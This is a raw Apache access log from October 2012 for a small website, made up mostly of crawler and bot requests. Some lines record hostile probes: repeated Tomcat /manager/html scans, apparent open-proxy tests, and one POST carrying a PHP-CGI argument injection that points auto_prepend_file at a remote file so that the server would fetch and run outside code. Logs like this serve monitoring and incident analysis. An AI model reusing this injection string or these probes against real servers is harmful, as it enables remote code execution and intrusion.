95.108.151.244 - - [19/Oct/2012:05:29:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.151.244 - - [19/Oct/2012:05:29:50 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.151.244 - - [19/Oct/2012:05:29:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.151.244 - - [19/Oct/2012:05:29:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.151.244 - - [19/Oct/2012:05:30:32 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.151.244 - - [19/Oct/2012:05:30:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.151.244 - - [19/Oct/2012:05:30:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
92.240.68.153 - - [19/Oct/2012:07:46:19 +0200] "GET http://www.leslarmesderos.com/site/adminphotos/upload/1465a.jpg HTTP/1.1" 404 347 "-" "webcollage/1.135a"
178.154.179.250 - - [19/Oct/2012:08:07:05 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.154.179.250 - - [19/Oct/2012:08:07:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
93.222.204.82 - - [19/Oct/2012:09:03:04 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1"
206.225.94.160 - - [19/Oct/2012:10:35:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1"
78.46.70.147 - - [19/Oct/2012:11:44:40 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
78.46.70.147 - - [19/Oct/2012:11:44:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.102.51.246 - - [19/Oct/2012:12:31:24 +0200] "GET http://24x7-allrequestsallowed.com/?PHPSESSID=7ab745aa00143SSQJ_W_EFBF%5CO HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
65.55.24.245 - - [19/Oct/2012:15:51:14 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.24.245 - - [19/Oct/2012:15:54:07 +0200] "GET /Heizoel-Berlin.html HTTP/1.1" 404 329 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
178.154.179.250 - - [19/Oct/2012:16:11:34 +0200] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.154.179.250 - - [19/Oct/2012:16:59:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.154.179.250 - - [19/Oct/2012:18:27:45 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.154.179.250 - - [19/Oct/2012:18:30:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
157.55.34.99 - - [19/Oct/2012:19:58:37 +0200] "t: www.dialyse-pforzheim.de" 400 329 "-" "-"
176.9.51.220 - - [19/Oct/2012:20:23:18 +0200] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.51.220 - - [19/Oct/2012:20:23:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
88.198.24.17 - - [19/Oct/2012:20:43:47 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
88.198.24.17 - - [19/Oct/2012:20:43:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
176.9.50.103 - - [19/Oct/2012:21:36:50 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.50.103 - - [19/Oct/2012:21:36:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
178.154.179.250 - - [20/Oct/2012:00:30:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
157.56.93.207 - - [20/Oct/2012:05:11:30 +0200] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.56.93.207 - - [20/Oct/2012:05:15:27 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.34.94 - - [20/Oct/2012:08:44:01 +0200] "t: www.dialyse-pforzheim.de" 400 329 "-" "-"
178.154.179.250 - - [20/Oct/2012:08:47:12 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.154.179.250 - - [20/Oct/2012:08:47:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
85.23.153.98 - - [20/Oct/2012:14:25:03 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.154.179.250 - - [20/Oct/2012:15:38:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
157.56.92.148 - - [20/Oct/2012:15:57:50 +0200] "t: www.dialyse-pforzheim.de" 400 329 "-" "-"
95.34.76.9 - - [20/Oct/2012:16:31:27 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
95.34.76.9 - - [20/Oct/2012:16:31:28 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
95.34.76.9 - - [20/Oct/2012:16:56:02 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
95.34.76.9 - - [20/Oct/2012:16:56:04 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
46.119.126.70 - - [20/Oct/2012:17:08:40 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
46.119.126.70 - - [20/Oct/2012:17:08:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
194.153.113.7 - - [20/Oct/2012:17:13:10 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
178.25.93.230 - - [20/Oct/2012:18:00:51 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.25.93.230 - - [20/Oct/2012:18:00:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
176.9.146.19 - - [20/Oct/2012:18:45:26 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.146.19 - - [20/Oct/2012:18:45:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
178.154.179.250 - - [20/Oct/2012:21:49:38 +0200] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
67.19.79.218 - - [20/Oct/2012:22:20:35 +0200] "GET /robots.txt HTTP/1.0" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT)"
178.77.126.55 - - [20/Oct/2012:22:38:05 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)"
178.77.126.55 - - [20/Oct/2012:22:38:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)"
64.246.165.190 - - [20/Oct/2012:23:02:01 +0200] "GET /robots.txt HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.190 - - [20/Oct/2012:23:02:01 +0200] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/aufzugs-hebetechnik.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
178.63.60.152 - - [21/Oct/2012:00:00:04 +0200] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
178.63.60.152 - - [21/Oct/2012:00:00:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
194.153.113.35 - - [21/Oct/2012:01:06:32 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
178.154.179.250 - - [21/Oct/2012:02:08:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.154.179.250 - - [21/Oct/2012:02:08:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
93.180.64.145 - - [21/Oct/2012:02:50:24 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; Plukkie/1.5; http://www.botje.com/plukkie.htm)"
93.180.64.145 - - [21/Oct/2012:02:50:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Plukkie/1.5; http://www.botje.com/plukkie.htm)"
64.246.165.150 - - [21/Oct/2012:03:01:26 +0200] "GET /robots.txt HTTP/1.0" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.150 - - [21/Oct/2012:03:01:26 +0200] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/bauaufzuege-hebetechnik.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
83.133.125.202 - - [21/Oct/2012:04:47:38 +0200] "GET / HTTP/1.1" 200 1229 "http://www.sumaja.de/?such_wert=berlin" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)"
218.201.121.99 - - [21/Oct/2012:05:36:55 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "-"
218.201.121.99 - - [21/Oct/2012:05:36:55 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "-"
218.201.121.99 - - [21/Oct/2012:05:36:55 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "-"
218.201.121.99 - - [21/Oct/2012:05:36:55 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "-"
218.201.121.99 - - [21/Oct/2012:05:36:55 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "-"
218.201.121.99 - - [21/Oct/2012:05:36:55 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "-"
218.201.121.99 - - [21/Oct/2012:05:36:55 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "-"
218.201.121.99 - - [21/Oct/2012:05:36:55 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "-"
218.201.121.99 - - [21/Oct/2012:05:36:55 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "-"
218.201.121.99 - - [21/Oct/2012:05:36:55 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "-"
92.240.68.153 - - [21/Oct/2012:06:12:25 +0200] "GET http://www.viajesyviajeros.com/mali.jpg HTTP/1.1" 404 323 "-" "webcollage/1.135a"
157.55.32.93 - - [21/Oct/2012:06:41:03 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.32.93 - - [21/Oct/2012:06:43:13 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.56.92.156 - - [21/Oct/2012:07:36:33 +0200] "t: www.dialyse-calw.de" 400 329 "-" "-"
64.246.165.170 - - [21/Oct/2012:09:24:17 +0200] "GET /robots.txt HTTP/1.0" 404 315 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.170 - - [21/Oct/2012:09:24:17 +0200] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/bmt-it.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
216.145.11.94 - - [21/Oct/2012:09:39:21 +0200] "GET /robots.txt HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
216.145.11.94 - - [21/Oct/2012:09:39:21 +0200] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/boedenundmehr.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
83.14.208.148 - - [21/Oct/2012:11:17:02 +0200] "GET /appConf.htm HTTP/1.1" 404 316 "-" "Python-urllib/2.4"
83.14.208.148 - - [21/Oct/2012:11:17:02 +0200] "GET /appConf.htm HTTP/1.1" 404 316 "-" "Python-urllib/2.4"
83.14.208.148 - - [21/Oct/2012:11:17:02 +0200] "GET /appConf.htm HTTP/1.1" 404 316 "-" "Python-urllib/2.4"
83.14.208.148 - - [21/Oct/2012:11:17:02 +0200] "GET /appConf.htm HTTP/1.1" 404 316 "-" "Python-urllib/2.4"
65.55.24.245 - - [21/Oct/2012:12:40:09 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
217.69.133.69 - - [21/Oct/2012:12:42:23 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; Mail.RU_Bot/2.0)"
65.55.24.245 - - [21/Oct/2012:13:27:17 +0200] "GET /Heizoel-Berlin.html HTTP/1.1" 404 329 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
178.154.179.250 - - [21/Oct/2012:15:25:59 +0200] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
5.9.107.48 - - [21/Oct/2012:17:12:38 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.107.48 - - [21/Oct/2012:17:12:40 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.154.179.250 - - [21/Oct/2012:18:21:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
176.9.139.112 - - [21/Oct/2012:18:25:14 +0200] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.139.112 - - [21/Oct/2012:18:25:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
178.154.179.250 - - [21/Oct/2012:19:31:01 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.154.179.250 - - [21/Oct/2012:19:31:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
66.249.73.150 - - [21/Oct/2012:19:54:38 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.150 - - [21/Oct/2012:19:54:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.56.92.148 - - [21/Oct/2012:21:05:57 +0200] "roxy-Connection: Keep-Alive" 400 329 "-" "-"
199.30.59.172 - - [21/Oct/2012:22:41:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
199.30.59.172 - - [21/Oct/2012:22:41:56 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
178.255.215.64 - - [21/Oct/2012:23:03:01 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
178.255.215.64 - - [21/Oct/2012:23:03:01 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
83.133.125.202 - - [21/Oct/2012:23:50:04 +0200] "GET / HTTP/1.1" 200 1229 "http://www.bigfinder.de/" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1)"
83.133.125.202 - - [21/Oct/2012:23:50:04 +0200] "GET / HTTP/1.1" 200 1229 "http://www.bigfinder.de/" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1)"
83.133.125.202 - - [21/Oct/2012:23:50:04 +0200] "GET / HTTP/1.1" 200 1229 "http://www.bigfinder.de/" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1)"
83.133.125.202 - - [21/Oct/2012:23:50:04 +0200] "GET / HTTP/1.1" 200 1229 "http://www.bigfinder.de/" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1)"
83.133.125.202 - - [21/Oct/2012:23:50:04 +0200] "GET / HTTP/1.1" 200 1229 "http://www.bigfinder.de/" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1)"
83.133.125.202 - - [21/Oct/2012:23:50:04 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
83.133.125.202 - - [21/Oct/2012:23:50:04 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
83.133.125.202 - - [21/Oct/2012:23:50:04 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
83.133.125.202 - - [21/Oct/2012:23:50:04 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
83.133.125.202 - - [21/Oct/2012:23:50:04 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
83.133.125.202 - - [21/Oct/2012:23:50:04 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
83.133.125.202 - - [21/Oct/2012:23:50:04 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
83.133.125.202 - - [21/Oct/2012:23:50:04 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
83.133.125.202 - - [21/Oct/2012:23:50:04 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
83.133.125.202 - - [21/Oct/2012:23:50:05 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
94.23.45.14 - - [22/Oct/2012:00:08:05 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
95.96.224.110 - - [22/Oct/2012:00:37:31 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
95.96.224.110 - - [22/Oct/2012:00:37:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
108.59.8.80 - - [22/Oct/2012:01:21:19 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
108.59.8.80 - - [22/Oct/2012:01:21:20 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
198.175.125.123 - - [22/Oct/2012:01:22:15 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
198.175.125.123 - - [22/Oct/2012:01:22:17 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
78.30.200.81 - - [22/Oct/2012:02:06:51 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
78.30.200.81 - - [22/Oct/2012:02:06:53 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
85.8.28.206 - - [22/Oct/2012:02:24:38 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
85.8.28.206 - - [22/Oct/2012:02:24:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
78.30.200.81 - - [22/Oct/2012:02:37:44 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
78.30.200.81 - - [22/Oct/2012:02:37:46 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.25.93.230 - - [22/Oct/2012:03:26:19 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.25.93.230 - - [22/Oct/2012:03:26:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.25.93.230 - - [22/Oct/2012:03:28:35 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.25.93.230 - - [22/Oct/2012:03:28:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.25.93.230 - - [22/Oct/2012:04:11:39 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.25.93.230 - - [22/Oct/2012:04:11:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
208.115.113.85 - - [22/Oct/2012:04:39:15 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)"
178.25.93.230 - - [22/Oct/2012:04:41:24 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.25.93.230 - - [22/Oct/2012:04:41:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
24.230.33.22 - - [22/Oct/2012:05:08:37 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
24.230.33.22 - - [22/Oct/2012:05:08:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
108.59.8.70 - - [22/Oct/2012:05:53:47 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
108.59.8.70 - - [22/Oct/2012:05:53:49 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
173.236.21.106 - - [22/Oct/2012:05:54:21 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
173.236.21.106 - - [22/Oct/2012:05:54:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
208.115.113.85 - - [22/Oct/2012:06:20:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)"
64.56.64.136 - - [22/Oct/2012:06:25:43 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
64.56.64.136 - - [22/Oct/2012:06:25:49 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
209.135.33.180 - - [22/Oct/2012:06:36:51 +0200] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://www.bellecitygames.com/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://www.bellecitygames.com/api.gif%20-n HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
64.246.161.42 - - [22/Oct/2012:06:40:03 +0200] "GET /leer.htm HTTP/1.1" 404 313 "http://whois.domaintools.com/dialyse-schoenebeck.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.161.42 - - [22/Oct/2012:06:40:04 +0200] "GET /leer.htm HTTP/1.1" 404 313 "http://whois.domaintools.com/dialyse-schoenebeck.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
